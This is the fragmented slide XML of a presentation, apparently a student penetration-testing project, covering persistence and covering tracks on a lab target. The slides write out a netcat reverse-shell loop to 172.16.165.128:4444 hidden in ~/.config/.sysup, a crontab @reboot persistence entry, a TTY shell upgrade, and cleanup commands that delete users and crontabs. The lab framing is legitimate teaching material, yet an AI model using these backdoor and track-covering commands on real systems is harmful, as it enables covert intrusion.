          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="681038" w="681038">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="681037" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="681037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6540" y="8161460"/>
            <a:ext cx="679012" cy="679012"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="679012" w="679012">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="679012" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="679012" y="679012"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="679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97881" y="2211762"/>
            <a:ext cx="6248029" cy="6248029"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="6248029" w="6248029">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6248029" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6248029" y="6248029"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="624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06" y="2639008"/>
            <a:ext cx="649744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Techniques for Maintaining Access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906" y="3553408"/>
            <a:ext cx="3056477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b="true" sz="23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Scheduled Tasks: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6446" y="4196210"/>
            <a:ext cx="11977144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Purpose: Scheduled tasks can be used to automate malicious scripts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6446" y="4636429"/>
            <a:ext cx="12444792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 applications to run at speciﬁed intervals, ensuring persistent access.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3906" y="5278626"/>
            <a:ext cx="3441018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b="true" sz="23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Backdoors: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552" y="5829805"/>
            <a:ext cx="12121038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Purpose: A backdoor provides a way to bypass normal authentication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552" y="6247992"/>
            <a:ext cx="7083454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procedures to gain access to the system.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3906" y="7328340"/>
            <a:ext cx="21247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4148" y="8214203"/>
            <a:ext cx="23351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Bach Scripts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6498" y="8215216"/>
            <a:ext cx="12632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Netcat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68869"/>
            <a:ext cx="6661766" cy="3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b="true" sz="23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we did to maintain access to the system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822" y="3355859"/>
            <a:ext cx="4481512" cy="3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5531" indent="-252766" lvl="1">
              <a:lnSpc>
                <a:spcPts val="3278"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="true" sz="2341">
                <a:solidFill>
                  <a:srgbClr val="37B4B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Backdoor &amp; Scheduled Task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9341" y="3943167"/>
            <a:ext cx="11475090" cy="81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gaining access from ftp backdoor, we try to put our backdoor in the system</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3278"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="true" sz="23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(reverse shell)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65382" y="5194923"/>
            <a:ext cx="9970105" cy="3935298"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="3935298" w="9970105">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9970105" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9970105" y="3935298"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="393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942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9108" y="4492791"/>
            <a:ext cx="1821012" cy="3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2095" indent="-226048" lvl="1">
              <a:lnSpc>
                <a:spcPts val="2931"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="true" sz="20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script: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4746" y="5027544"/>
            <a:ext cx="1238441" cy="29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#!/bin/bash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4746" y="5400681"/>
            <a:ext cx="1455347" cy="29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while true; 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43666" y="5766174"/>
            <a:ext cx="4053170" cy="29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nc &lt;attacker-ip&gt; -e /bin/bash &amp;&amp; break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7412" y="6122930"/>
            <a:ext cx="895797" cy="29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sleep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4746" y="6484163"/>
            <a:ext cx="1941848" cy="29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done &amp;./dev/null &amp;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108" y="7560553"/>
            <a:ext cx="3051143" cy="3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2095" indent="-226048" lvl="1">
              <a:lnSpc>
                <a:spcPts val="2931"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="true" sz="20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Scheduled task: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13549" y="8095306"/>
            <a:ext cx="5284624" cy="59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3"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="17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(crontab -l 2&gt;/dev/null; echo "@reboot /bin/bash ~/.config/.sysup/.sysup.sh &amp;") | crontab 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0700" y="2817380"/>
            <a:ext cx="4658656" cy="3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~/.config/.sysup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54608" y="2817380"/>
            <a:ext cx="7655608" cy="3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-&gt;  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2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Creates the directory ~/.config/.sysup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0274" y="3595250"/>
            <a:ext cx="9646187" cy="72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sz="2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-e '#!/bin/bash\nwhile true; do\n nc 172.16.165.128 4444 -e /bin/bash &amp;&amp; break\n sleep 10\ndone &amp;&gt;/dev/null &amp;' &gt; ~/.config/.sysup/.sysup.sh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0770" y="4094444"/>
            <a:ext cx="6719170" cy="3105934"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="3105934" w="6719170">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6719169" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6719169" y="3105934"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3105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0770" y="3370243"/>
            <a:ext cx="20921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nc -lvnp 4444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62752" y="5638472"/>
            <a:ext cx="775109" cy="446053"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="277781" cy="159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7781" cy="159855"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect r="r" b="b" t="t" l="l"/>
              <a:pathLst>
                <a:path h="159855" w="277781">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="277781" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="277781" y="159855"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="159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7781" cy="207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428580"/>
            <a:ext cx="9091127" cy="4202370"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="4202370" w="9091127">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9091127" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9091127" y="4202369"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="420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964282"/>
            <a:ext cx="3798046" cy="1062981"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="968967" cy="271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68967" cy="271190"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect r="r" b="b" t="t" l="l"/>
              <a:pathLst>
                <a:path h="271190" w="968967">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="968967" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="968967" y="271190"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="271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68967" cy="29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238376"/>
            <a:ext cx="2718228" cy="43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b="true" sz="252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Proof of concept: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967190"/>
            <a:ext cx="7703342" cy="33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  <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="19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python -c 'import pty; pty.spawn("/bin/bash")'; stty raw -echo; fg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899909"/>
            <a:ext cx="1645325" cy="33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  <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="19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nc -lvnp 4444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42400"/>
            <a:ext cx="7295166" cy="35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Upgrades the reverse shell to a fully interactive TTY shell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38090" y="2238376"/>
            <a:ext cx="9176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passwd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8090" y="2738472"/>
            <a:ext cx="6671341" cy="36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that I changed the root </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="true" sz="21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password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="219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be </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="true" sz="21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338090" y="3386913"/>
            <a:ext cx="10055132" cy="4115334"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="4115334" w="10055132">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="10055132" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10055132" y="4115333"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="4115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338090" y="6857313"/>
            <a:ext cx="3798046" cy="412670"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="968967" cy="105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8967" cy="105281"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect r="r" b="b" t="t" l="l"/>
              <a:pathLst>
                <a:path h="105281" w="968967">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="968967" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="968967" y="105281"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="105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68967" cy="133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38090" y="3536965"/>
            <a:ext cx="3798046" cy="647505"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="968967" cy="1651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68967" cy="165193"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect r="r" b="b" t="t" l="l"/>
              <a:pathLst>
                <a:path h="165193" w="968967">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="968967" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="968967" y="165193"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="16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68967" cy="193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9846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375" y="1164465"/>
            <a:ext cx="133975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COVERING TRACKS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2752" y="2316643"/>
            <a:ext cx="8662392" cy="86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</a:t>
            </a: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 or obfuscate any evidence of your activities on the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compromised system.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2752" y="3760000"/>
            <a:ext cx="3254127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0D92B9"/>
                </a:solidFill>
                <a:latin typeface="Canva Sans"/>
                <a:ea typeface="Canva Sans"/>
                <a:cs typeface="Canva Sans"/>
                <a:sym typeface="Canva Sans"/>
              </a:rPr>
              <a:t>Remove Created User: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0694" y="4468873"/>
            <a:ext cx="4053334" cy="86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userdel &lt;User_hacker&gt;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rm -rf /home/&lt;User_hacker&gt;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5691" y="3760000"/>
            <a:ext cx="2514600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0D92B9"/>
                </a:solidFill>
                <a:latin typeface="Canva Sans"/>
                <a:ea typeface="Canva Sans"/>
                <a:cs typeface="Canva Sans"/>
                <a:sym typeface="Canva Sans"/>
              </a:rPr>
              <a:t>Delete Backdoor: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5626" y="4468873"/>
            <a:ext cx="4566642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rm -f ~/.config/.sysup/.sysup.sh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5691" y="5463496"/>
            <a:ext cx="3832622" cy="41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37B4BE"/>
                </a:solidFill>
                <a:latin typeface="Canva Sans"/>
                <a:ea typeface="Canva Sans"/>
                <a:cs typeface="Canva Sans"/>
                <a:sym typeface="Canva Sans"/>
              </a:rPr>
              <a:t>Delete the Scheduled task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5626" y="6172369"/>
            <a:ext cx="1471315" cy="86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crontab -l</a:t>
            </a:r>
          </a:p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sz="23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crontab -r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675277" cy="379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438879"/>
            <a:ext cx="9695980" cy="1482672"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="358020" cy="54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8020" cy="54747"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect r="r" b="b" t="t" l="l"/>
              <a:pathLst>
                <a:path h="54747" w="358020">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="358020" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="358020" y="54747"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="5474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8020" cy="92847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7489" y="6817630"/>
            <a:ext cx="699626" cy="699626"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="699626" w="699626">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="699626" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="699626" y="699626"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="699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28725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DOCUMENTATION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228718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GITHUB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85057"/>
            <a:ext cx="637834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To see the full Documentation, please visit the GitHub Repo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5821" y="6779530"/>
            <a:ext cx="443440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  <a:hlinkClick r:id="rId6" tooltip="https://github.com/MohamedSayed47/DEPI_Final_project"/>
              </a:rPr>
              <a:t>https://github.com/MohamedSayed47/DEPI_Final_project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65573" y="-291189"/>
            <a:ext cx="18288000" cy="10287000"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="675277" cy="379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0027" y="2461770"/>
            <a:ext cx="23084947" cy="22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29"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="true" sz="18255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7571" y="4523699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105" y="8961120"/>
            <a:ext cx="13424681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Looking forward to your feedback and any questions you may have.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720225" y="7844334"/>
            <a:ext cx="270330" cy="270330"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="270330" w="270330">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="270330" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="270330" y="270330"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="27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20225" y="6733498"/>
            <a:ext cx="270330" cy="270330"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="270330" w="270330">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="270330" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="270330" y="270331"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="270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1031" y="6740028"/>
            <a:ext cx="302672" cy="257272"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="257272" w="302672">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="302672" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="302672" y="257271"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2572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7202" y="7878272"/>
            <a:ext cx="270330" cy="202453"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="202453" w="270330">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="270330" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="270330" y="202454"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="202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4105" y="8274624"/>
            <a:ext cx="1103890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We appreciate your time and interest in our project.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05352"/>
            <a:ext cx="3772057" cy="2835963"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="139245" cy="104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245" cy="104689"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect r="r" b="b" t="t" l="l"/>
              <a:pathLst>
                <a:path h="104689" w="139245">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="139245" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="139245" y="104689"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="10468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245" cy="14278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96561" y="3205352"/>
            <a:ext cx="3727018" cy="2871805"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="137582" cy="106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82" cy="106012"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect r="r" b="b" t="t" l="l"/>
              <a:pathLst>
                <a:path h="106012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06012"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="106012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82" cy="14411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64421" y="3205352"/>
            <a:ext cx="3727018" cy="2871805"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="137582" cy="1060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82" cy="106012"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect r="r" b="b" t="t" l="l"/>
              <a:pathLst>
                <a:path h="106012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06012"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="106012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82" cy="14411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32282" y="3205352"/>
            <a:ext cx="3727018" cy="3369363"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="137582" cy="124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82" cy="124380"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect r="r" b="b" t="t" l="l"/>
              <a:pathLst>
                <a:path h="12438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24380"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="124380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82" cy="16248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2634894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77910" y="3837762"/>
            <a:ext cx="628599" cy="652320"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="652320" w="628599">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="628599" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="628599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6802755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712419" y="3837762"/>
            <a:ext cx="695302" cy="652320"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="652320" w="695302">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="695302" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="695302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0970616" y="5646478"/>
            <a:ext cx="514629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901770" y="3837762"/>
            <a:ext cx="652320" cy="652320"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="652320" w="652320">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="652320" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="652320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15138476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205026" y="3837762"/>
            <a:ext cx="381529" cy="652320"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="652320" w="381529">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="381529" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="381529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558164" y="6574715"/>
            <a:ext cx="3701136" cy="2374248"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="136627" cy="876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6627" cy="87645"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect r="r" b="b" t="t" l="l"/>
              <a:pathLst>
                <a:path h="87645" w="136627">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="136627" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="136627" y="87645"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="87645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6627" cy="12574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7779" y="6574715"/>
            <a:ext cx="3772057" cy="2374248"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="139245" cy="876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9245" cy="87645"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect r="r" b="b" t="t" l="l"/>
              <a:pathLst>
                <a:path h="87645" w="139245">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="139245" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="139245" y="87645"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="8764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9245" cy="12574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348961" y="6574715"/>
            <a:ext cx="3727018" cy="2374248"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="137582" cy="8764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582" cy="87645"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect r="r" b="b" t="t" l="l"/>
              <a:pathLst>
                <a:path h="8764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87645"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="8764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37582" cy="12574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364421" y="6574715"/>
            <a:ext cx="3727018" cy="2374248"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="137582" cy="8764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582" cy="87645"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect r="r" b="b" t="t" l="l"/>
              <a:pathLst>
                <a:path h="8764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87645"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="87645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7582" cy="12574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447317" y="6827015"/>
            <a:ext cx="934823" cy="934823"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="934823" w="934823">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="934823" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="934823" y="934824"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="934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853979" y="6927995"/>
            <a:ext cx="747903" cy="747903"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="747903" w="747903">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="747903" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="747903" y="747903"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="7479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975335" y="6873971"/>
            <a:ext cx="840912" cy="840912"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="840912" w="840912">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="840912" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="840912" y="840912"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="8409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712419" y="6864269"/>
            <a:ext cx="860316" cy="860316"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="860316" w="860316">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="860315" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="860315" y="860316"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="8603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274787" y="1080866"/>
            <a:ext cx="55367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AGENDA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1663" y="4946831"/>
            <a:ext cx="3421092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INTRODUCTION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459734" y="4946831"/>
            <a:ext cx="3200671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METHODOLOGY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9634931" y="4946831"/>
            <a:ext cx="3185999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3778978" y="4946831"/>
            <a:ext cx="3233625" cy="87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KEY VULNERABILITIES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04182" y="8039313"/>
            <a:ext cx="3421092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5612134" y="8039313"/>
            <a:ext cx="3200671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64421" y="7993489"/>
            <a:ext cx="3727018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DOCUMENTATION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3969743" y="8039313"/>
            <a:ext cx="3233625" cy="87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CONCLUSION &amp; Q&amp;A</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="2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060" y="0"/>
            <a:ext cx="7536751" cy="8627843"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="812800" cy="930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30469"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect r="r" b="b" t="t" l="l"/>
              <a:pathLst>
                <a:path h="9304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2"/>
              <a:stretch>
                <a:fillRect l="-51757" t="0" r="-517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6248" y="7987023"/>
            <a:ext cx="7277950" cy="1271277"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="268736" cy="469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736" cy="46941"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect r="r" b="b" t="t" l="l"/>
              <a:pathLst>
                <a:path h="46941" w="268736">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="268736" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="268736" y="46941"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="46941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8736" cy="85041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26176" y="8777341"/>
            <a:ext cx="6218093" cy="185913"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="229601" cy="6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601" cy="6865"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect r="r" b="b" t="t" l="l"/>
              <a:pathLst>
                <a:path h="6865" w="229601">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="229601" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="22960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960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26176" y="8777341"/>
            <a:ext cx="5437852" cy="185913"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="200791" cy="6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791" cy="6865"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect r="r" b="b" t="t" l="l"/>
              <a:pathLst>
                <a:path h="6865" w="200791">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="200791" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20079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02060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079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26176" y="8339219"/>
            <a:ext cx="4298823" cy="24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20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Evolution of Attack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25000" y="8339219"/>
            <a:ext cx="1919269" cy="24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b="true" sz="20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90%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400362">
            <a:off x="1158260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464029" y="1102956"/>
            <a:ext cx="889391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64029" y="2233256"/>
            <a:ext cx="6522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TO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3172" y="3329552"/>
            <a:ext cx="9199120" cy="132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2373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This project focuses on conducting a comprehensive network penetration test on the </a:t>
            </a:r>
            <a:r>
